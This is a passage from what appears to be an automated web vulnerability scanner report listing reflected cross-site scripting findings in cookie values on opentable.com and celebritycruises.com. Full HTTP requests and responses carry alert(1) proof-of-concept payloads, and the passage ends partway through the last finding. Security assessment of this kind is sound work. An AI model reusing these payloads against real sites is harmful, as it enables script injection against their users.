Cookie: JSESSIONID=000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027f78c3<script>alert(1)</script>fc81ed4d2f5; wuc=USA; s_pers=%20s_evar44cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043868'%255D%255D%7C1475498843868%3B%20s_evar46cvp%3D%255B%255B'Direct%252520Load'%252C'1317646043871'%255D%255D%7C1475498843871%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en
Vary: Accept-Encoding
Content-Length: 85201
Date: Mon, 03 Oct 2011 12:48:33 GMT
Connection: close
Set-Cookie: JSESSIONID=0000yzyaj-B5e2uhREbN1QVTyHy:12hdbcveb; Path=/; Domain=celebritycruises.com
Set-Cookie: wuc=USA; Expires=Wed, 02 Oct 2013 12:48:33 GMT; Path=/; Domain=.celebritycruises.com


   <!DOCTYPE html>
<html>
   <head>
       <meta charset="utf-8">
       
           
                           <title>Plan and Book</title>
   <meta property="og:title" content="Plan and Book
...[SNIP]...
<p style="color: #333;">
Build: cel_com_09222011_1 2011-09-20 04:30 AM
last recached on Mon Oct 03 06:27:56 EDT 2011 000052bP0YHmMBHoM8_sGg4WKHr:12hdbd027f78c3<script>alert(1)</script>fc81ed4d2f5
</p>
...[SNIP]...

4.87. http://www.opentable.com/interim.aspx [lsCKE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the lsCKE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29da"><script>alert(1)</script>aab47995e43 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a57&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestreff29da"><script>alert(1)</script>aab47995e43&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=rJbB%2fhLqgoEHXmgKp6a0pg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<img src="http://o.opentable.com/b/ss/otrestreff29da"><script>alert(1)</script>aab47995e43/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...

4.88. http://www.opentable.com/interim.aspx [lsCKE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb1e9"-alert(1)-"a4ba175ba10 was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a57&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestrefcb1e9"-alert(1)-"a4ba175ba10&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=M6UYKHKYVTca7zEymJLulg%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=6fd8f%250d%250a72ac6b74771; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<!--
var s_account="otrestrefcb1e9"-alert(1)-"a4ba175ba10";
//-->
...[SNIP]...

4.89. http://www.opentable.com/opentables.aspx [lsCKE cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the lsCKE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86571"-alert(1)-"6df2532a40d was submitted in the lsCKE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1=100&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=9&vbefreg=9&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref86571"-alert(1)-"6df2532a40d&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=JfcZkNNS6r2CnZUe8zD3Tw%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=9&vbefreg=9&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
